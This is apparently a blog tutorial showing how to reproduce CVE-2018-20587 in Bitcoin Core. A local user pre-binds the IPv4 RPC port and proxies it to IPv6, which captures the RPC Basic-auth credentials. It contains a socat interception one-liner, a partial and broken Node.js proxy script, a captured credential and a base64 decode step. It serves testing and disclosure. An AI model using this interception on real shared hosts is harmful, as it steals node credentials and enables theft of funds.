This tutorial will guide you through reproducing the exploit for CVE-2018-20587 to help test and ensure that you have updated your configuration for future prevention.
Today, bitcoin core developer Luke Dashjr released information relating to a known bug affecting all versions of the bitcoin core client software, including the latest 0.17.1 version under CVE-2018–20587 (Common Vulnerabilities and Exposures).
This issue is isolated to a multi-user system where users who have direct access to the system might not be trusted and can obtain the RPC login details for a bitcoin node hosted on the same system.
Please note that the following information is provided for education purposes only. Here is how you can exploit and test this for yourself using nodejs. The code below assumes you have a server configured using regtest
mode that creates an http server which attempts to bind itself to both the IPv6 and IP4V localhost address on port 18332.
Note :
There are many ways to achieve this including issuing a MITM (Man-in-the-middle) attacks using socat, netcat, ngrep, tcpdump etc.socat TCP4-LISTEN:18332,bind=,fork,reuseaddr tcp6:[::1]:18332,fork,forever
For the purposes of this tutorial however, you can use the following script to create a proxy between the IPv4 and IPv6 addresses on the same host.
var http = require("http");
var httpProxy = require('http-proxy');
var options = {};
var proxy = httpProxy.createProxyServer(options);
http.createServer(function(req, res) {
proxy.web(req, res, {
target: 'http://[::1]:18332'
proxy.on('proxyReq', function(proxyReq, req, res, options) {
Packages required for executing this script include http-proxynpm install http-proxy
You will need to run the above script before starting bitcoind
to ensure that this port has been reserved and cannot be used by bitcoind
Next, start up bitcoind
and execute the following command.
gr0kchain: ~$ bitcoin-cli getblockchaininfo
By issuing this command, bitcoin-cli
should attempt to query the node using the getblockchaininfo
method, which in return proxies the request via IP4V (our nodejs proxy) at
to IPv6 at ::1:18332
where bitcoind
is listening.
The output generated by the nodejs script should be as follows.
gr0kchain: ~$ node ./index.js
[ 'Host',
'Basic Yml0Y29pbjpsb2NhbDMyMQ==',
'40' ]
Decoding the authentication details is fairly simple as it uses a typical basic http authorisation header. To decode this try the following:
gr0kchain: ~$ echo "Yml0Y29pbjpsb2NhbDMyMQ==" | base64 -D
The HTTP protocols basic authentication scheme uses a base64
encoded string username/password pair separate by a colon.
Workarounds for overcoming this problem are published in the disclosure.
In this tutorial, we explored a method for exploiting CVE-2018–20587 on misconfigured bitcoin core clients.
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